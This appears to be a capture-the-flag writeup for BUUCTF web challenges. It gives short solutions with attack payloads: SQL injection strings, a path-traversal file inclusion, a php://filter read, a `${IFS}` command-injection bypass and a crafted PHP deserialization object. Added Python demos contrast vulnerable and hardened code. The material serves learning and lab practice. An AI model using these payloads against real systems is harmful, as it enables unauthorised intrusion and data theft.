buuctf web
2022-06-25 04:48:00 【hercu1iz】
pentest
- [Geek challenge 2019]EasySQL
- [HCTF 2018]WarmUp
- [Geek challenge 2019]Havefun
- [ACTF2020 Freshman competition]Include
- [Strong net cup 2019]Note casually
- [SUCTF 2019]EasySQL
- [ACTF2020 Freshman competition]Exec
- [Geek challenge 2019]Secret File
- [Geek challenge 2019]LoveSQL
- [GXYCTF2019]Ping Ping Ping
- [Geek challenge 2019]Knife
- [Geek challenge 2019]Http
- [Geek challenge 2019]Upload
- [ACTF2020 Freshman competition]Upload
- [RoarCTF 2019]Easy Calc
- [Geek challenge 2019]BabySQL
- [Geek challenge 2019]PHP
[Geek challenge 2019]EasySQL
SQL injection (universal password)
Single-quote closure
1' or 1=1 #
The leading quote closes the quote that opens the username value; the # comments out everything after it, including the trailing quote and the password check.
Principle:
sql="select * from user where username='' and password=''"
sql="select * from user where username='1' or 1=1 # ' and password=''"
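To see the principle run, here is an added example (mine, not from the original writeup) that builds the same concatenated query over a constructed SQLite table and compares it with a parameterised query. SQLite does not treat `#` as a line comment the way MySQL does, so the payload here uses the portable `-- ` comment; against the challenge's MySQL backend the `#` form above does the same job.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the challenge's user table (sample rows, not real data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # Same pattern as the writeup's principle: the input is pasted between the quotes,
    # so a quote inside the input ends the string literal and the rest is parsed as SQL.
    sql = ("select * from user where username='" + username +
           "' and password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    # Placeholders keep the input as data: a quote in it never reaches the SQL parser.
    sql = "select * from user where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()


def demo(payload="1' or 1=1 -- "):
    # Returns (rows matched by the vulnerable query, rows matched by the safe query)
    # for the universal-password payload used as the username with a wrong password.
    conn = make_db()
    return (len(login_vulnerable(conn, payload, "wrong")),
            len(login_safe(conn, payload, "wrong")))
```

`demo()` returns every row from the vulnerable query (the `or 1=1` makes the WHERE clause true for all users and the comment removes the password check) and no rows from the parameterised one, where the whole payload is just a username nobody has.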
[HCTF 2018]WarmUp
PHP file inclusion
The whitelist check below can be satisfied while the value that is later included still carries an attacker-controlled path, so the file inclusion ends up reading an arbitrary file.
```php
<?php
class emmm
{
    public static function checkFile(&$page)
    {
        // Whitelist of pages that may be included
        $whitelist = ["source" => "source.php", "hint" => "hint.php"];

        // isset() checks that the variable is set, is_string() that it is a string;
        // if either fails, the request is rejected
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it A";
            return false;
        }

        // First check: does the value passed in match a whitelist entry?
        if (in_array($page, $whitelist)) {
            return true;
        }

        // Cut at the question mark: mb_strpos($page . '?', '?') is the index of the first '?'
        // in $page (or the length of $page if there is none), so $_page is everything before it
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );

        // Second check: does the part before the '?' match the whitelist?
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // URL-decode $page, then cut at the first '?' again
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );

        // Third check: does the decoded, truncated value match the whitelist?
        if (in_array($_page, $whitelist)) {
            return true;
        }

        echo "you can't see it";
        return false;
    }
}
```
Notes:
mb_strpos($haystack, $needle) returns the position of the first occurrence of $needle in $haystack.
// $haystack: the string to search in.
// $needle: the string to search for.
mb_substr($str, $start, $length) returns part of a string.
// $str: required. The string to extract the substring from.
// $start: required. Where in the string to start.
// $length: optional. Number of characters to return; defaults to the rest of the string.
Only the truncated copy $_page is compared against the whitelist, while $page itself is left untouched for the include that follows, which is what the payload relies on:
/source.php?file=hint.php?../../../../../ffffllllaaaagggg
[Geek challenge 2019]Havefun

[ACTF2020 Freshman competition]Include
Reference: https://blog.csdn.net/destiny1507/article/details/82347371
[Strong net cup 2019]Note casually
https://www.cnblogs.com/wjw-zm/p/12359735.html
[SUCTF 2019]EasySQL
SQL stacked queries; the `*,1` trick
https://blog.csdn.net/weixin_44866139/article/details/105857487
[ACTF2020 Freshman competition]Exec
Inadequate filtering
https://blog.csdn.net/vanarrow/article/details/108181645
[Geek challenge 2019]Secret File
PHP wrapper php://filter: ?file=php://filter/convert.base64-encode/resource=
File inclusion
https://www.cnblogs.com/g0udan/p/12244878.html
[Geek challenge 2019]LoveSQL
Standard enumeration of databases, tables and columns
https://blog.csdn.net/qq_45521281/article/details/105533626
[GXYCTF2019]Ping Ping Ping
ping;cmd command chaining; the difficulty is getting past the string filtering.
Notes:
In the Linux shell, IFS is the Internal Field Separator.
https://blog.csdn.net/sinat_34761046/article/details/114698231
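Added example (my own, not the challenge's code): a stand-in `ping` handler whose blacklist rejects literal whitespace, the `${IFS}` payload that gets a second command through anyway, and a hardened version that validates the value as an IP address and never goes through a shell. The blacklist is constructed for the demo and is not the challenge's real filter; `echo` stands in for `ping -c 1` so the example runs offline.

```python
import ipaddress
import re
import subprocess

# Constructed stand-in for the challenge's blacklist, not its real filter: literal
# whitespace is rejected, so a space-separated command such as "cat flag.php" cannot be typed.
BLOCKED = re.compile(r"[ \t\n]")


def ping_vulnerable(host):
    """Concatenates the user value into a shell command line.
    Returns the command's stdout, or None if the blacklist rejected the value."""
    if BLOCKED.search(host):
        return None
    # `echo` stands in for `ping -c 1`; the injection point is identical.
    result = subprocess.run("echo pinging " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def ping_safe(host):
    """Hardened version: the value must parse as an IP literal, and it is passed as its
    own argv element, so there is no shell to interpret ';' or '${IFS}'."""
    ipaddress.ip_address(host)  # raises ValueError for anything that is not an IP address
    result = subprocess.run(["echo", "pinging", host], capture_output=True, text=True)
    return result.stdout


def is_rejected(host):
    """True when ping_safe refuses the value."""
    try:
        ping_safe(host)
    except ValueError:
        return True
    return False
```

`127.0.0.1;echo injected` is blocked because of the space, but `127.0.0.1;echo${IFS}injected` passes the blacklist: the shell expands `${IFS}` to its whitespace characters and then splits the word on them, so the second command runs as `echo injected`. The hardened handler rejects both, since neither is an IP address.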
[Geek challenge 2019]Knife
Connect with the kitchen knife (China Chopper) and it's done.
[Geek challenge 2019]Http
View the source code,
or scan with Burp, which also finds the file.
Then add the HTTP request header fields the hints ask for and it's done.
https://blog.csdn.net/qq_45163122/article/details/105905864
[Geek challenge 2019]Upload
Notes:
phtml usually means an HTML file with embedded PHP code, but the server also parses it as PHP.
GIF89a image-header spoofing (https://www.cnblogs.com/hcflyy/p/3568839.html?utm_source=tuicool&utm_medium=referral)
https://blog.csdn.net/qq_45163122/article/details/105907554
[ACTF2020 Freshman competition]Upload
Same as the previous challenge. The only difference is an extra front-end JS check; open F12 and delete the JS validation.
[RoarCTF 2019]Easy Calc
GET request; bypass via PHP's parameter-name parsing quirk to reach the information disclosure.
https://blog.csdn.net/weixin_44077544/article/details/102630714
[Geek challenge 2019]BabySQL
Keywords are filtered; double-writing bypasses it.
https://www.cnblogs.com/h3zh1/p/12548753.html
[Geek challenge 2019]PHP
url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
PHP deserialization primer: https://blog.csdn.net/weixin_42751456/article/details/88758908
Bypass reference: https://blog.csdn.net/weixin_44077544/article/details/103542260
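Added example (mine, not from the writeup or the challenge): the parsing quirk Easy Calc relies on, reproduced in Python. PHP rewrites incoming parameter names before filling `$_GET` (leading spaces dropped, then remaining spaces and dots turned into `_`, as in `php_register_variable` in php_variables.c), so a front WAF that matches the raw key `num` never sees `%20num`, while PHP still delivers the value as `$_GET['num']`. The WAF rule is a constructed stand-in; array syntax (`[...]`) is not modelled.

```python
from urllib.parse import parse_qsl


def waf_blocks(query):
    """Constructed stand-in WAF rule: refuse a request whose raw query carries a `num` key."""
    return any(key == "num" for key, _ in parse_qsl(query, keep_blank_values=True))


def php_param_name(raw):
    """How PHP normalises an incoming parameter name: leading spaces are dropped,
    then remaining spaces and dots become underscores."""
    name = raw.lstrip(" ")
    return name.replace(" ", "_").replace(".", "_")


def php_get(query):
    """The $_GET array PHP builds from a raw query string (percent-decoding included)."""
    return {php_param_name(k): v for k, v in parse_qsl(query, keep_blank_values=True)}
```

`?%20num=1` (or `?+num=1`, since `+` decodes to a space) slips past the key match but still arrives in the application as `num`; a WAF has to normalise names the same way the backend does, or it is checking a different request than the one PHP handles.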
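Added example (mine, not from the writeup): a small serialiser that reproduces the payload above and makes its two tricks explicit. Private properties are serialised as `\0Name\0username`, and the `s:14` length counts the two NUL bytes, which travel in the URL as `%00`. The header declares 3 members while only 2 follow; on PHP before 5.6.25 / 7.0.10 that mismatch skips `__wakeup()` (CVE-2016-7124), which is the bypass the payload's member count relies on.

```python
def php_value(value):
    """Serialise a scalar the way PHP does (only the types this payload needs)."""
    if isinstance(value, bool):          # bool before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_serialize_private(cls, props, declared_count=None):
    """Serialise an object whose properties are all private.
    PHP names a private property "\\0Class\\0name" and the s:N length counts those NUL
    bytes, so "\\0Name\\0username" is 14 (the writeup's s:14).
    declared_count lets the member count in the header differ from the real number."""
    body = ""
    for name, value in props.items():
        key = f"\0{cls}\0{name}"
        body += f's:{len(key.encode())}:"{key}";' + php_value(value)
    count = len(props) if declared_count is None else declared_count
    return f'O:{len(cls)}:"{cls}":{count}:{{' + body + "}"


def build_payload():
    """The writeup's payload: two private members with the count declared as 3 to skip
    __wakeup(), NUL bytes URL-encoded as %00 so they survive the query string."""
    raw = php_serialize_private("Name", {"username": "admin", "password": 100},
                                declared_count=3)
    return raw.replace("\0", "%00")
```

`build_payload()` yields exactly the string after `?select=` above; leaving `declared_count` unset gives the honest `O:4:"Name":2:{...}` form that PHP itself would emit.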